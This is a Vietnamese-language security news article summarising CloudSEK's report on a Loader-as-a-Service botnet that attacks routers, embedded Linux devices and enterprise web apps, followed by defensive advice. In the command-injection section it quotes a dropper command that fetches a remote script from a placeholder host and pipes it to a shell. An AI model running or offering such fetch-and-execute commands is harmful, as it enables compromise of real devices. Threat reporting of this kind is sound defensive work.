CloudSEK đã phát hiện một chiến dịch botnet Loader-as-a-Service tinh vi, đại diện cho một mối đe dọa mạng đáng kể trong sáu tháng qua. Chiến dịch này tận dụng các nhật ký command-and-control (C2) bị lộ để điều phối các cuộc tấn công chống lại các bộ định tuyến SOHO, thiết bị Linux nhúng và ứng dụng doanh nghiệp.
Phân tích Chiến dịch Loader-as-a-Service
Vectơ Tấn công và Khai thác Lỗ hổng
Các tác nhân đe dọa khai thác các tham số POST không được vệ sinh, như trường NTP, syslog và hostname. Chúng cũng sử dụng thông tin đăng nhập mặc định và các lỗ hổng CVE đã biết.
Cụ thể, các lỗ hổng trong hệ thống WebLogic, WordPress và vBulletin được nhắm mục tiêu để đạt được remote code execution. Điều này cho phép kẻ tấn công thực thi mã tùy ý từ xa, kiểm soát hoàn toàn các hệ thống bị ảnh hưởng.
Gia tăng Tấn công và Mã độc
Từ tháng 7 đến tháng 8 năm 2025, khối lượng tấn công đã tăng 230%. Các cuộc tấn công này phát tán nhiều loại mã độc đa kiến trúc, bao gồm các tệp nhị phân Morte và payload khai thác tiền điện tử.
CloudSEK tiếp tục giám sát hoạt động này và đã cảnh báo các khách hàng bị ảnh hưởng có công nghệ phù hợp với các vectơ mục tiêu. Nhóm TRIAD của CloudSEK đã xác định hoạt động này lần đầu tiên trong quá trình quét định kỳ tìm kiếm hạ tầng độc hại. Báo cáo chi tiết về botnet Loader-as-a-Service của CloudSEK cung cấp thêm thông tin.
Chuỗi Tấn công và Nhật ký Command-and-Control
Server chứa các nhật ký C2 được các tác nhân đe dọa phát hành trong sáu tháng qua. Điều này cung cấp cái nhìn sâu sắc về vectơ tấn công và hạ tầng đang được sử dụng.
Điều tra các nhật ký bảng điều khiển bị lộ đã tiết lộ một chuỗi các mô-đun có phương pháp. Mỗi mô-đun tương ứng với một giai đoạn trong chuỗi tấn công. Các đánh dấu nhật ký chính trong ngoặc vuông biểu thị các chức năng riêng biệt:
Giai đoạn Khởi tạo và Đăng nhập
- [ReplyPageLogin]: Ghi lại các nỗ lực đăng nhập vào giao diện quản trị web. Nó ghi lại cả các thử nghiệm thông tin đăng nhập mặc định và các cuộc tấn công brute-force. Xác thực thành công sẽ chuyển sang các giai đoạn tiêm lệnh tiếp theo.
Giai đoạn Tiêm lệnh và Triển khai Mã độc
- [ConfigSystemCommand] và [SystemCommand]: Ghi lại các lệnh tiêm. Ví dụ:
wget -qO- http://IP/rondo.*.sh | sh, các lệnhbusyboxhoặc các chuỗi dựa trên TFTP/FTP. Điều này chỉ ra việc phân phối các script dropper tối thiểu.
wget -qO- http://[IP_SERVER_MA_DOC]/rondo.*.sh | shLệnh này thường được dùng để tải xuống và thực thi một script từ một máy chủ từ xa.
Giai đoạn Xác nhận và Thu thập Thông tin
- [ReplyErrorPage] và [ReplySuccessPage]: Báo hiệu các lỗi thực thi hoặc xác nhận. Điều này hướng dẫn logic thử lại của nhà điều hành hoặc gắn cờ các máy chủ bị xâm nhập để dàn dựng payload.
- [ReplyDeviceInfo]: Ghi nhật ký trinh sát sau khai thác. Nó thu thập địa chỉ MAC, phiên bản firmware và các dịch vụ có thể truy cập. Mục đích là để điều chỉnh việc lựa chọn payload, cho dù là C2 kéo dài, khai thác tiền điện tử hay bán lại quyền truy cập.
Mục tiêu và Phương thức Phát tán Mã độc
Chiến dịch botnet này nhắm mục tiêu một cách có hệ thống vào các đối tượng sau:
- Các bộ định tuyến SOHO.
- Thiết bị Linux nhúng.
- Ứng dụng doanh nghiệp (WebLogic, WordPress, vBulletin).
Cơ chế Phân phối Payload
Kẻ tấn công sử dụng nhiều giao thức để phân phối payload, bao gồm HTTP, TFTP và FTP. Chúng sử dụng các trình bao BusyBox để tối đa hóa khả năng tương thích trên các loại thiết bị khác nhau.
Thông tin đăng nhập mặc định và các cuộc tấn công tự động hóa tạo điều kiện thuận lợi cho việc truy cập ban đầu. Các máy chủ dropper dự phòng trải rộng trên các dải IP đa dạng đảm bảo khả năng phục hồi chống lại việc gỡ bỏ.
Hành vi Sau Xâm nhập
Sau khi xâm nhập thành công, các nhà điều hành triển khai các công cụ khai thác JSON-RPC miners hoặc bot kiểu Mirai. Các bot này tận dụng tài nguyên bị chiếm quyền để khai thác tiền điện tử và thực hiện các chiến dịch DDoS. Đây là một khía cạnh đáng lo ngại khác của mối đe dọa mạng này.
Tác động và Rủi ro Đối với Hệ thống và Hạ tầng
Sự tinh vi của mối đe dọa mạng này mang lại nhiều rủi ro nghiêm trọng cho các tổ chức và cá nhân.
Rủi ro cho Doanh nghiệp
Việc khai thác các lỗ hổng như deserialization của WebLogic, injection OGNL của Struts2 và exploit JNDI làm tăng nguy cơ rò rỉ dữ liệu. Ngoài ra, nó còn dẫn đến khả năng di chuyển ngang trong mạng và triển khai các payload thứ cấp, ví dụ như mã độc tống tiền (ransomware).
Thỏa hiệp Hạ tầng
Các bộ định tuyến biên của doanh nghiệp đối mặt với nguy cơ cạn kiệt băng thông và gián đoạn hệ thống nhạy cảm với thời gian thông qua NTP poisoning. Ngoài ra, thao túng DNS qua giao diện chẩn đoán cũng là một mối lo ngại lớn.
Rủi ro từ Bên thứ Ba
Các bộ định tuyến doanh nghiệp nhỏ và thiết bị IoT đóng vai trò là bàn đạp cho các cuộc tấn công chống lại khách hàng doanh nghiệp. Trong khi đó, hạ tầng nhà cung cấp dịch vụ bị xâm nhập có thể khuếch đại phạm vi tấn công của mối đe dọa mạng này.
Tác động Vận hành
Các tác động vận hành bao gồm hiệu suất mạng suy giảm do tuyển dụng botnet. Điều này làm tăng khối lượng công việc phản ứng sự cố từ các cuộc tấn công đa vectơ và nhu cầu lớn hơn về săn lùng mối đe dọa trên các bề mặt đa dạng.
Chiến lược Phòng vệ Toàn diện
Để đối phó hiệu quả với mối đe dọa mạng ngày càng phức tạp này, cần có một chiến lược phòng vệ đa tầng và chủ động.
Phát hiện (SOC/SIEM)
- Triển khai giám sát nhật ký và phân tích hành vi bất thường.
- Sử dụng các hệ thống phát hiện xâm nhập (IDS) để nhận diện các dấu hiệu tấn công.
Ngăn chặn (Network/SecOps)
- Áp dụng chính sách bảo mật chặt chẽ cho các tham số POST không đáng tin cậy.
- Thay đổi thông tin đăng nhập mặc định trên tất cả thiết bị và hệ thống.
- Thực hiện các bản vá bảo mật kịp thời cho các lỗ hổng CVE đã biết. Đặc biệt là trên các hệ thống WebLogic, WordPress và vBulletin.
- Triển khai tường lửa ứng dụng web (WAF) và hệ thống IPS để bảo vệ ứng dụng và mạng.
Phản ứng (IR)
- Xây dựng kế hoạch ứng phó sự cố rõ ràng và thực hành định kỳ.
- Cách ly các hệ thống bị xâm nhập để ngăn chặn lây lan mã độc.
- Tiến hành điều tra pháp y để xác định nguồn gốc và phạm vi tấn công.
CloudSEK dự báo sự tiếp tục phát triển của hoạt động Loader-as-a-Service này, với việc mở rộng mục tiêu thiết bị và sự tinh vi của payload. Giám sát cảnh giác, khắc phục nhanh chóng và các chiến lược phòng thủ nhiều lớp là rất quan trọng để giảm thiểu mối đe dọa mạng mới nổi này.
